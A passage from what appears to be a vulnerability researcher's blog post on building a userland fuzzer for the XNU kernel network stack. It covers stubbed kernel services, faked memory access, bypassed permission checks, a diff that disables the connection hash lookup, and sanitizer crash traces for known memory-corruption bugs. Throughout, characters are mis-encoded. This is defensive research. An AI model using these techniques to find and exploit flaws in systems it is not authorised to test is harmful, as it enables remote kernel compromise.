Β  required uint32 th_sum =Β 8;

Β  required uint32 th_urp =Β 9;

Β  // Ned's extensions

Β  required boolΒ is_pure_syn =Β 10;

Β  required boolΒ is_pure_ack =Β 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_synΒ and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::stringΒ get_tcp_hdr(constΒ TcpHdrΒ &hdr)Β {

Β  structΒ tcphdr tcphdr =Β {

Β  Β  Β  .th_sport =Β (unsignedΒ short)hdr.th_sport(),

Β  Β  Β  .th_dport =Β (unsignedΒ short)hdr.th_dport(),

Β  Β  Β  .th_seq =Β __builtin_bswap32(hdr.th_seq()),

Β  Β  Β  .th_ack =Β __builtin_bswap32(hdr.th_ack()),

Β  Β  Β  .th_off =Β hdr.th_off(),

Β  Β  Β  .th_flags =Β 0,

Β  Β  Β  .th_win =Β (unsignedΒ short)hdr.th_win(),

Β  Β  Β  .th_sum =Β 0,Β // TODO(nedwill): calculate the checksum instead of skipping it

Β  Β  Β  .th_urp =Β (unsignedΒ short)hdr.th_urp(),

Β  };

Β  forΒ (constΒ intΒ flag :Β hdr.th_flags())Β {

Β  Β  tcphdr.th_flags ^=Β flag;

Β  }

Β  // Prefer pure syn

Β  ifΒ (hdr.is_pure_syn())Β {

Β  Β  tcphdr.th_flags &=Β ~(TH_RST |Β TH_ACK);

Β  Β  tcphdr.th_flags |=Β TH_SYN;

Β  }Β elseΒ ifΒ (hdr.is_pure_ack())Β {

Β  Β  tcphdr.th_flags &=Β ~(TH_RST |Β TH_SYN);

Β  Β  tcphdr.th_flags |=Β TH_ACK;

Β  }

Β  std::stringΒ dat((charΒ *)&tcphdr,Β (charΒ *)&tcphdr +Β sizeof(tcphdr));

Β  returnΒ dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zallocΒ should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyinΒ and copyoutΒ need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just β€œnop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the β€œHigh-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of timeΒ and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_initΒ function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

Β  Β  #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

Β  Β  #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

Β  Β  #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

Β  Β  #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

Β  Β  #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

staticΒ int

pipepair_alloc(structΒ pipe **rp_out,Β structΒ pipe **wp_out)

{

Β  Β  Β  Β  structΒ pipepair *pp =Β zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

Β  Β  Β  Β  nbigpipe =Β 0;

Β  Β  Β  Β  vm_size_t zone_size;

Β  Β  Β  Β  zone_size =Β 8192Β *Β sizeof(structΒ pipepair);

Β  Β  Β  Β  pipe_zone =Β zinit(sizeof(structΒ pipepair),Β zone_size,Β 4096,Β "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default")))Β boolΒ initialize_network()Β {

Β  mcache_init();

Β  mbinit();

Β  eventhandler_init();

Β  pipeinit();

Β  dlil_init();

Β  socketinit();

Β  domaininit();

Β  loopattach();

Β  ether_family_init();

Β  tcp_cc_init();

Β  net_init_run();

Β  intΒ res =Β necp_init();

Β  assert(!res);

Β  returnΒ true;

}


The original
bsd_initΒ is 683 lines long, but our initialize_networkΒ clone is the preceding short snippet. I want to remark how cool I found it that you could β€œboot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this β€œboot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to β€œhigh-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: β€œclassic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use callocΒ to service the request. zfreeΒ simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

structΒ zone {

Β  uintptr_t size;

};

structΒ zone*Β zinit(uintptr_t size,Β uintptr_t max,Β uintptr_t alloc,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β constΒ char*Β name)Β {

Β  structΒ zone*Β zone =Β (structΒ zone*)calloc(1,Β sizeof(structΒ zone));

Β  zone->size =Β size;

Β  returnΒ zone;

}

void*Β zalloc(structΒ zone*Β zone)Β {

Β  assert(zone !=Β NULL);

Β  returnΒ calloc(1,Β zone->size);

}

voidΒ zfree(void*Β zone,Β void*Β dat)Β {

Β  (void)zone;

Β  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the β€œclient” networking code.

structΒ m_hdr {

Β  Β  Β  Β  structΒ mbuf Β  Β  *mh_next;Β Β  Β  Β  /* next buffer in chain */

Β  Β  Β  Β  structΒ mbuf Β  Β  *mh_nextpkt;Β Β  Β /* next chain in queue/record */

Β  Β  Β  Β  caddr_t Β  Β  Β  Β  mh_data;Β Β  Β  Β  Β /* location of data */

Β  Β  Β  Β  int32_t Β  Β  Β  Β  mh_len;Β Β  Β  Β  Β  /* amount of data in this mbuf */

Β  Β  Β  Β  u_int16_t Β  Β  Β  mh_type;Β Β  Β  Β  Β /* type of data in this mbuf */

Β  Β  Β  Β  u_int16_t Β  Β  Β  mh_flags;Β Β  Β  Β  /* flags; see below */

};

/*

Β * The mbuf object

Β */

structΒ mbuf {

Β  Β  Β  Β  structΒ m_hdr m_hdr;

Β  Β  Β  Β  unionΒ {

Β  Β  Β  Β  Β  Β  Β  Β  structΒ {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  structΒ pkthdr MH_pkthdr;Β Β  Β  Β  Β /* M_PKTHDR set */

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  unionΒ {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  structΒ m_ext MH_ext;Β Β  Β /* M_EXT set */

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  charΒ Β  Β MH_databuf[_MHLEN];

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  }Β MH_dat;

Β  Β  Β  Β  Β  Β  Β  Β  }Β MH;

Β  Β  Β  Β  Β  Β  Β  Β  charΒ Β  Β M_databuf[_MLEN];Β Β  Β  Β  Β  Β  Β  Β  /* !M_PKTHDR, !M_EXT */

Β  Β  Β  Β  }Β M_dat;

};


I didn’t include the
pkthdrΒ nor m_extΒ structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXTΒ flag. As these allocations must be aligned, I use posix_memalignΒ to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_freeΒ implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issueΒ linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR:Β AddressSanitizer:Β heap-use-after-free on address 0x61500026afe5Β at pc 0x7ff60f95caceΒ bp 0x7ffd4d5617b0Β sp 0x7ffd4d5617a8

READ of size 1Β at 0x61500026afe5Β thread T0

Β  Β  #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

Β  Β  #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

Β  Β  #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5Β isΒ located 229Β bytes inside of 256-byteΒ region [0x61500026af00,0x61500026b000)

freed byΒ thread T0 here:

Β  Β  #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

Β  Β  #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

Β  Β  #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

Β  Β  #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

Β  Β  #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

Β  Β  #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

Β  Β  #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyinΒ and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`.Β As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

Β  Β  #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

Β  Β  #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

Β  Β  #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

Β  Β  #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

Β  Β  #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

Β  Β  #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

Β  Β  #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1Β is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1Β everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

intΒ __attribute__((warn_unused_result))

copyin(void*Β user_addr,Β void*Β kernel_addr,Β size_t nbytes)Β {

Β  // Address 1 means use fuzzed bytes, otherwise use real bytes.

Β  // NOTE: this does not support nested useraddr.

Β  ifΒ (user_addr !=Β (void*)1)Β {

Β  Β  memcpy(kernel_addr,Β user_addr,Β nbytes);

Β  Β  returnΒ 0;

Β  }

Β  ifΒ (get_fuzzed_bool())Β {

Β  Β  returnΒ -1;

Β  }

Β  get_fuzzed_bytes(kernel_addr,Β nbytes);

Β  returnΒ 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1Β occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level β€œsequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_providerΒ field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

staticΒ int

socket_common(structΒ proc *p,

Β  Β  intΒ domain,

Β  Β  intΒ type,

Β  Β  intΒ protocol,

Β  Β  pid_t epid,

Β  Β  int32_t *retval,

Β  Β  intΒ delegate)

{

Β  Β  Β  Β  structΒ socket *so;

Β  Β  Β  Β  structΒ fileproc *fp;

Β  Β  Β  Β  intΒ fd,Β error;

Β  Β  Β  Β  AUDIT_ARG(socket,Β domain,Β type,Β protocol);

#if CONFIG_MACF_SOCKET_SUBSET

Β  Β  Β  Β  ifΒ ((error =Β mac_socket_check_create(kauth_cred_get(),Β domain,

Β  Β  Β  Β  Β  Β  type,Β protocol))Β !=Β 0)Β {

Β  Β  Β  Β  Β  Β  Β  Β  returnΒ error;

Β  Β  Β  Β  }

#endifΒ /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was Β stubbed.

Β  Β  #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

Β  Β  #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

Β  Β  #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

Β  Β  #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

Β  Β  #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

Β  Β  #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void*Β kauth_cred_get()Β {

Β  returnΒ (void*)1;

}

Now we crash actually checking the KAuth permissions.

Β  Β  #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

Β  Β  #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

Β  Β  #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

Β  Β  #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

Β  Β  #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

Β  Β  #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Β  Β  #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

intΒ mac_socket_check_create()Β {Β returnΒ 0;Β }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving β€œsoundness” or β€œcompleteness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt)Β with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the β€œbottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(structΒ mbuf *m,Β intΒ off0)

{

// ...

Β  Β  Β  Β  ifΒ (isipv6)Β {

Β  Β  Β  Β  Β  Β  inp =Β in6_pcblookup_hash(&tcbinfo,Β &ip6->ip6_src,Β th->th_sport,

Β  Β  Β  Β  Β  Β  Β  Β  &ip6->ip6_dst,Β th->th_dport,Β 1,

Β  Β  Β  Β  Β  Β  Β  Β  m->m_pkthdr.rcvif);

Β  Β  Β  Β  }Β else

#endifΒ /* INET6 */

Β  Β  Β  Β  inp =Β in_pcblookup_hash(&tcbinfo,Β ip->ip_src,Β th->th_sport,

Β  Β  Β  Β  Β  Β  ip->ip_dst,Β th->th_dport,Β 1,Β m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_argΒ are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

Β * Lookup PCB in hash list.

Β */

structΒ inpcb *

in_pcblookup_hash(structΒ inpcbinfo *pcbinfo,Β structΒ in_addr faddr,

Β  Β  u_int fport_arg,Β structΒ in_addr laddr,Β u_int lport_arg,Β intΒ wildcard,

Β  Β  structΒ ifnet *ifp)

{

// ...

Β  Β  head =Β &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr,Β lport,Β fport,

Β  Β  Β  Β  pcbinfo->ipi_hashmask)];

Β  Β  LIST_FOREACH(inp,Β head,Β inp_hash)Β {

-Β Β  Β  Β  Β  Β  Β  Β  ifΒ (inp->inp_faddr.s_addr ==Β faddr.s_addr &&

-Β Β  Β  Β  Β  Β  Β  Β  Β  Β  inp->inp_laddr.s_addr ==Β laddr.s_addr &&

-Β Β  Β  Β  Β  Β  Β  Β  Β  Β  inp->inp_fport ==Β fport &&

-Β Β  Β  Β  Β  Β  Β  Β  Β  Β  inp->inp_lport ==Β lport)Β {

+Β Β  Β  Β  Β  Β  Β  Β  ifΒ (!get_fuzzed_bool())Β {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (in_pcb_checkstate(inp,Β WNT_ACQUIRE,Β 0)Β !=

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  WNT_STOPUSING)Β {

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  lck_rw_done(pcbinfo->ipi_lock);

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  returnΒ inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50Β 100644

---Β a/bsd/netinet/in_pcb.h

+++Β b/bsd/netinet/in_pcb.h

@@Β -611,10Β +611,9Β @@Β structΒ inpcbinfo {

Β  Β  Β  Β  u_int32_t Β  Β  Β  Β  Β  Β  Β  ipi_flags;

Β };

-#defineΒ INP_PCBHASH(faddr,Β lport,Β fport,Β mask)Β \

-Β  Β  Β  Β (((faddr)Β ^Β ((faddr)Β >>Β 16)Β ^Β ntohs((lport)Β ^Β (fport)))Β &Β (mask))

-#defineΒ INP_PCBPORTHASH(lport,Β mask)Β \

-Β  Β  Β  Β (ntohs((lport))Β &Β (mask))

+// nedwill: let all pcbs share the same hash

+#defineΒ  Β  Β  Β  INP_PCBHASH(faddr,Β lport,Β fport,Β mask)Β (0)

+#defineΒ  Β  Β  Β  INP_PCBPORTHASH(lport,Β mask)Β (0)

Β #defineΒ INP_IS_FLOW_CONTROLLED(_inp_)Β \

Β  Β  Β  Β  ((_inp_)->inp_flags &Β INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR:Β AddressSanitizer:Β heap-buffer-overflow on address 0x61d00029f474Β at pc 0x00000049fcb7Β bp 0x7ffcddc88590Β sp 0x7ffcddc87d58

WRITE of size 20Β at 0x61d00029f474Β thread T0

Β  Β  #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

Β  Β  #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

Β  Β  #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

Β  Β  #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

Β  Β  #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

Β  Β  #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

Β  Β  #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

Β  Β  #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474Β isΒ located 12Β bytes to the left of 2048-byteΒ region [0x61d00029f480,0x61d00029fc80)

allocated byΒ thread T0 here:

Β  Β  #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

Β  Β  #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

Β  Β  #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

Β  Β  #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

Β  Β  #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

Β  Β  #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

Β  Β  #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

Β  Β  #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

Β  Β  #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

Β  Β  #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_inputΒ path.

commands {

Β  ip_input {

